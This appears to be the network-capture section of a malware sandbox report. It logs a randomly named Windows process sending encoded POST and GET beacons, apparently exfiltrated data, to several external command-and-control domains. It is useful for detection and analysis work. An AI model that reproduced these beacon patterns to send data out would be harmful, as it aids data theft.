                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                   Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 50007 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 4068 | Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:30.107841015 CET | Bytes transferred: 386 | Direction: OUT
                                                                                                                                                   GET /vdvc/?W638b4U=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRcKpdTLsadcBjXT18ECqhEbYKAo2NhS9FS63soq1W+eFfLA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:30.915450096 CET | Bytes transferred: 1236 | Direction: IN
                                                                                                                                                   HTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:30 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'nonce-838fb3b572544910b15d5e9ad08c1b20';
                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                  Data Raw: 39 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 38 33 38 66 62 33 62 35 37 32 35 34 34 39 31 30 62 31 35 64 35 65 39 61 64 30 38 63 31 62 32 30 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: 93a<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-838fb3b572544910b15d5e9ad08c1b20';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:30.915812016 CET | Bytes transferred: 212 | Direction: IN
                                                                                                                                                   Data Raw: 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d
                                                                                                                                                  Data Ascii: class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https:/
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:30.915832043 CET | Bytes transferred: 1214 | Direction: IN
                                                                                                                                                   Data Raw: 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c
                                                                                                                                                  Data Ascii: /whois.gandi.net/en/results?search=astorg-group.info"><strong>View the WHOIS results of astorg-group.info</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Park


                                                                                                                                                   Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 50008 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4068 | Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:36.071978092 CET | Bytes transferred: 630 | Direction: OUT
                                                                                                                                                   POST /0m8a/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.fiqsth.vip
                                                                                                                                                  Origin: http://www.fiqsth.vip
                                                                                                                                                  Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 47 61 55 67 7a 4b 50 54 45 61 53 70 58 45 33 66 43 51 54 4a 78 68 62 67 31 46 6b 55 41 4c 4d 63 39 44 2f 34 4b 4b 74 7a 4c 76 71 6e 6d 35 5a 4e 55 50 35 38 61 6a 4e 4e 61 72 73 62 4b 36 51 42 2b 7a 6b 67 37 2f 31 70 76 34 7a 63 6b 2f 42 51 62 35 39 42 79 78 4e 50 79 37 51 63 66 33 70 76 4e 49 2f 54 5a 37 53 39 47 33 7a 51 47 49 54 45 33 4d 79 53 50 36 35 76 52 77 66 30 62 4b 38 62 35 56 66 48 2f 70 4a 2f 6c 74 61 49 6c 6f 4e 4b 58 5a 66 4e 59 52 74 32 74 34 67 51 6e 6c 38 47 33 4b 63 71 37 43 5a 35 52 6f 4a 39 72 59 45 7a 48 45 6e 6d 30 54 68 62 58 51 51 3d
                                                                                                                                                  Data Ascii: W638b4U=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYRt2t4gQnl8G3Kcq7CZ5RoJ9rYEzHEnm0ThbXQQ=


                                                                                                                                                   Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 50009 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4068 | Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:38.611922979 CET | Bytes transferred: 650 | Direction: OUT
                                                                                                                                                   POST /0m8a/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.fiqsth.vip
                                                                                                                                                  Origin: http://www.fiqsth.vip
                                                                                                                                                  Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 6f 63 2b 69 50 34 4a 4c 74 7a 4d 76 71 6e 2b 4a 5a 45 51 50 35 4e 61 6a 78 46 61 70 49 62 4b 36 45 42 2b 7a 30 67 34 49 68 71 75 6f 7a 61 76 66 42 6f 55 5a 39 42 79 78 4e 50 79 37 45 69 66 78 42 76 4e 38 37 54 66 76 47 2b 59 6e 7a 54 50 6f 54 45 7a 4d 79 57 50 36 35 42 52 30 2f 65 62 4d 34 62 35 55 76 48 2b 34 4a 2b 71 74 61 4f 34 34 4d 6c 45 4a 69 68 5a 53 64 76 6b 59 70 57 2b 48 73 69 37 63 74 41 68 67 52 52 43 49 6c 46 37 4c 4d 45 57 30 47 50 75 77 78 72 4a 48 48 7a 58 49 72 6e 71 5a 69 66 42 4f 6e 4b 4c 6e 68 41 56 78 41 75
                                                                                                                                                  Data Ascii: W638b4U=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCIlF7LMEW0GPuwxrJHHzXIrnqZifBOnKLnhAVxAu


                                                                                                                                                   Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 50010 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4068 | Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:41.306106091 CET | Bytes transferred: 1667 | Direction: OUT
                                                                                                                                                   POST /0m8a/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.fiqsth.vip
                                                                                                                                                  Origin: http://www.fiqsth.vip
                                                                                                                                                  Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Ascii: W638b4U=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZgc+Vn4ToFzNvqng5ZJQP5QandBap15K48B4V4g58Nqkozag/BTb59uyxdLy7UifxBvN6XTJLS+anzQGITQ3MyyP6x3R06rb8Yb+0/Hyqx+jtaM74M9EJu+ZSBjkb1w+FMi+IsH8j8HU5Nnpq4YGxCemxlAGEzXfoGPne3HDOuHchVvV1pYUGdJa1BA75+im7QPhZAORSsGFEagsZQD1nLFksemAHZHHr0dn6CFuAWbBN7AVGjekfhHg3kCPMlpQe1mKj1DrFpT8PyBEKzCvzh8yFktHzadSKfCpPKAvzOSA5U+QpPSx4Sc5Ds69m873XJtB5yxxBqTyEjHJpLPFC0ttmZIDYJmUrsYKuH6WjOSGt38HA1KQev2P4/lJAd3wVEmj5OTEDg1aZi6b1Oi00wciP4S9910tKkFIog7Crleqle25dhRXv+UoMAT5C4C2kgu/ALZ97msRIXwI7kxDMnmdcTrtDruVaK8qCY0nv9xINMjB+IRI/aW/Yfa3fCJ61ULCLoWvm98xoghJznZndC8PR5He0AEurWwwXtjhJVzRy7tMbTW+zfEkCPCy2DkD9lYLwui34x6BgFyklqf2EJ0Rq6nLf1y5iME/TZc68ZQ7Wo6QboQjizLOA4ga5Hk3PeAc3yxiyX8cHOQ8an/9OrrYbC7kidrT1EEZOAW0HRc/PM/zUjrayBnTE/BC7tAdO7+VXEZ7puTbMgEmXAkQCawX16czVifVecRYIW47B6+IAuPqVvm2XyxS7gjWOQAvvrQlkc+us/QOgznOay6ap7RoCB/juCD80EzDaqtjum6w7ay0f9JBX5HLqBm5hceuIYNcQAlL3qQzISsZHGarAFliLerKj+ZQ35UHRjIcf5rXb6iNtCS6IImslgLOVAbsr9bWgKCpJ3PK+8AL1+x5iIdqFu19gG76OTMoyclgunP2m5DPAyzjLso73gf8Uyrr+Sn [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50011 | 3.33.130.190 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:41:43.911240101 CET | 379 | OUT | GET /0m8a/?W638b4U=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAr/vHodlZDokX5k5j35YEbCksENzyPa61ZxusEcT508vfTQ==&Xll=50hLc0Hhy HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.fiqsth.vip
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:41:44.503148079 CET | 409 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 14 Nov 2024 14:41:44 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAr/vHodlZDokX5k5j35YEbCksENzyPa61ZxusEcT508vfTQ==&Xll=50hLc0Hhy"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50012 | 3.33.130.190 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:41:49.704267025 CET | 642 | OUT | POST /ezyn/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: max-age=0
Connection: close
Host: www.bio-thymus.com
Origin: http://www.bio-thymus.com
Referer: http://www.bio-thymus.com/ezyn/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Ascii: W638b4U=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99Pvt4YGOQN3/zJkXhUjViJDmbU7ShgcSV+Wding=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50013 | 3.33.130.190 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:41:52.251157999 CET | 662 | OUT | POST /ezyn/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Connection: close
Host: www.bio-thymus.com
Origin: http://www.bio-thymus.com
Referer: http://www.bio-thymus.com/ezyn/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Ascii: W638b4U=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpveLHzlwQ97PdGt8w0virGH6Q/nQ7VTr+QckCZ6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50014 | 3.33.130.190 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:41:54.797796011 CET | 1679 | OUT | POST /ezyn/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: max-age=0
Connection: close
Host: www.bio-thymus.com
Origin: http://www.bio-thymus.com
Referer: http://www.bio-thymus.com/ezyn/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50015 | 3.33.130.190 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:41:57.341712952 CET | 383 | OUT | GET /ezyn/?W638b4U=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMJKMiK3EdvOJmV73Jy75+c2YHLSLsa6dhHSYwd0sxfTHy3A==&Xll=50hLc0Hhy HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.bio-thymus.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:41:57.997410059 CET | 409 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 14 Nov 2024 14:41:57 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMJKMiK3EdvOJmV73Jy75+c2YHLSLsa6dhHSYwd0sxfTHy3A==&Xll=50hLc0Hhy"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50016 | 47.52.221.8 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:04.436578989 CET | 642 | OUT | POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Ascii: W638b4U=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVzFC+uzWlbKZcdPNC1ON9DMZVGj/gh1+u1SRea8=
Nov 14, 2024 15:42:05.386183977 CET | 390 | IN | HTTP/1.1 404 Not Found
Date: Thu, 14 Nov 2024 14:42:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Connection: close
Content-Type: text/html; charset=iso-8859-1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50017 | 47.52.221.8 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:06.972146988 CET | 662 | OUT | POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
    Data Ascii: W638b4U=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujghFVrIxRUX0WChANoz5vvv15YNuYrQ2Gt0ACJK
Nov 14, 2024 15:42:07.926253080 CET | 390               | IN        | HTTP/1.1 404 Not Found
    Date: Thu, 14 Nov 2024 14:42:07 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 179
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
39         | 192.168.2.5 | 50018       | 47.52.221.88   | 80               | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:09.518564939 CET | 1679              | OUT       | POST /9ezc/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1244
    Cache-Control: max-age=0
    Connection: close
    Host: www.wukong.college
    Origin: http://www.wukong.college
    Referer: http://www.wukong.college/9ezc/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
    Data Ascii: W638b4U= [TRUNCATED]
Nov 14, 2024 15:42:10.511049986 CET | 390               | IN        | HTTP/1.1 404 Not Found
    Date: Thu, 14 Nov 2024 14:42:10 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 179
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
40         | 192.168.2.5 | 50019       | 47.52.221.88   | 80               | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:12.066786051 CET | 383               | OUT       | GET /9ezc/?Xll=50hLc0Hhy&W638b4U=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+NZNi8BTPy99Tau97oJsSOpJizwynXn/5fxfwmQ1lNSou+g== HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.wukong.college
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:42:13.143342972 CET | 390               | IN        | HTTP/1.1 404 Not Found
    Date: Thu, 14 Nov 2024 14:42:12 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
41         | 192.168.2.5 | 50020       | 23.106.59.18   | 80               | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:18.379656076 CET | 663               | OUT       | POST /95c0/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 208
    Cache-Control: max-age=0
    Connection: close
    Host: www.vehiculargustav.click
    Origin: http://www.vehiculargustav.click
    Referer: http://www.vehiculargustav.click/95c0/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
